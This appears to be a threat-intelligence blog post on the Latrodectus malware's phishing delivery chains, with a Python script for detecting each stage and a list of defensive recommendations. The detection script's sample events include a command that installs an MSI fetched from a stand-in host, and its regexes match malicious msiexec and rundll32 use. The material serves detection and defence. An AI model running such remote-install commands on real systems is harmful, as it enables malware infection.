New TTPs Discovered For Latrodectus Malware Exploit Themes Associated with Microsoft and Cloudflare

Pragya
May 1, 2024 · 4 min read


Security researchers have uncovered new TTPs for a backdoor named Latrodectus, which is being distributed in phishing campaigns that use Microsoft Azure and Cloudflare lures to appear legitimate.

Latrodectus (aka Unidentified 111 and IceNova) is a Windows malware downloader first discovered in November 2023 and used by the threat actors tracked as TA577 and TA578. Its primary function is to download additional EXE and DLL payloads or to execute commands. Researchers have correlated this malware with the creators of the widely deployed IcedID modular malware loader.

Earlier Attack Sequence:

  1. The attack begins with the adversary filling out online contact forms to send fake copyright infringement notices to targeted organizations.
  2. The link in the fake notices leads victims to a Google Firebase URL that hosts a JavaScript file. When executed, this file uses the Windows installer (MSIEXEC) to run an MSI file from a WebDAV share, which contains the Latrodectus DLL payload.
  3. Before executing on the victim’s device, the malware performs various sandbox evasion checks to avoid detection. These checks are designed to identify whether the malware is running in a sandbox environment commonly used for security analysis.
  4. After passing the evasion checks, the malware initializes by sending a victim registration report to its operators, which includes information about the infected system and environment.
  5. Latrodectus, acting as a downloader, communicates with a command and control (C2) server to receive further instructions.

Recent Attack Sequence:

  1. The attack starts with reply-chain phishing emails carrying either malicious PDF attachments or embedded URLs, which lead to the installation of the Latrodectus malware.
  2. The attachments use generic names like ‘04–25-Inv-Doc-339.pdf’ and pretend to be a document hosted in the Microsoft Azure cloud that must first be downloaded to be viewed.
  3. Clicking the ‘Download Document’ button redirects the user to a fake ‘Cloudflare security check’ that asks them to solve an easy math question. This is likely meant to evade email security scanners and deliver the payload only to real users.
  4. When the correct answer is entered, the fake Cloudflare captcha automatically downloads a JavaScript file posing as a document, with a name like “Document_i79_13b364058–83054409r0449–8089z4.js”.
  5. The downloaded JavaScript is heavily obfuscated, with comments that hide a function which extracts text and executes the script to download an MSI from a hardcoded URL.
  6. When the MSI file is installed, it drops a DLL in the %AppData%\Custom_update folder, which is then launched by rundll32.exe. The file names are likely random per installation.
  7. The dropped DLL is the Latrodectus malware, which runs quietly in the background, waiting for payloads to install or commands to execute.
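As an added example (not from the report), the following Python rules evaluate constructed process-creation events for the three host-side stages described above: a script host running the fake “Document_….js”, msiexec fetching an MSI from a URL or WebDAV share, and rundll32 loading a DLL from %AppData%\Custom_update. The event format, user name, host name and file names are assumptions made up for the example.

```python
import re
from typing import Dict, List

# Constructed Sysmon/EDR-style process-creation events; the user, host
# and file names are made up for this example, not indicators from the report.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\alice\Downloads\Document_i79_13b364058-83054409r0449-8089z4.js"'},
    {"image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i http://lure.invalid/pkg.msi /qn"},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\alice\AppData\Roaming\Custom_update\a1b2c3.dll,Entry"},
    # Benign rundll32 use that must not fire.
    {"image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL"},
]

# Each rule: (name, image filenames it applies to, regex over the command line).
RULES = [
    # Stage 1: a script host running the fake "Document_...js" served by the lure.
    ("js_document_lure", {"wscript.exe", "cscript.exe"},
     re.compile(r"(?i)\\Document_[^\\\"']+\.js\b")),
    # Stage 2: msiexec installing an MSI from a URL or a UNC/WebDAV share.
    ("msiexec_remote_msi", {"msiexec.exe"},
     re.compile(r"(?i)(?:https?://|\\\\)\S+\.msi\b")),
    # Stage 3: rundll32 loading a DLL from %AppData%\Custom_update.
    ("rundll32_custom_update", {"rundll32.exe"},
     re.compile(r"(?i)\\AppData\\(?:Roaming\\)?Custom_update\\[^\s,]+\.dll")),
]


def match_event(event: Dict[str, str]) -> List[str]:
    """Return the names of all rules the event matches."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    return [name for name, images, rx in RULES
            if image in images and rx.search(event["cmdline"])]


def scan(events: List[Dict[str, str]]) -> Dict[str, object]:
    """Evaluate every event; flag the full chain when all three stages appear."""
    hits: Dict[str, List[int]] = {}
    for idx, ev in enumerate(events):
        for name in match_event(ev):
            hits.setdefault(name, []).append(idx)
    return {"hits": hits, "full_chain": all(r[0] in hits for r in RULES)}


if __name__ == "__main__":
    print(scan(SAMPLE_EVENTS))
```

Any single stage is worth an alert on its own; seeing all three on one host within a short window is the strong signal that the chain completed.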

In the recent attack flow, Latrodectus has been observed dropping additional payloads such as the Lumma information stealer and Danabot.

If a device becomes infected with Latrodectus, it is critical to take the system offline as soon as possible and evaluate the network for unusual behavior.

For Indicators of Compromise (IOCs), refer to the link.

It is recommended to:

  - Monitor the network for the presence of the mentioned Indicators of Compromise (IOCs).
  - Implement email security solutions to detect and block phishing emails containing malicious attachments or URLs.
  - Utilize advanced threat detection mechanisms to analyse email attachments, and employ URL filtering technologies to block access to known malicious domains.
  - Make sure Endpoint Detection & Response (EDR) tools have been implemented to detect the latest malware and suspicious activities on endpoints.
  - Enforce the principle of least privilege to limit users’ access to sensitive systems and data, and implement multi-factor authentication (MFA).
  - Implement network segmentation, firewalls, and intrusion detection/prevention systems (IDS/IPS) to monitor and control network traffic.
  - Raise awareness among your staff about the risks of opening suspicious emails or documents.
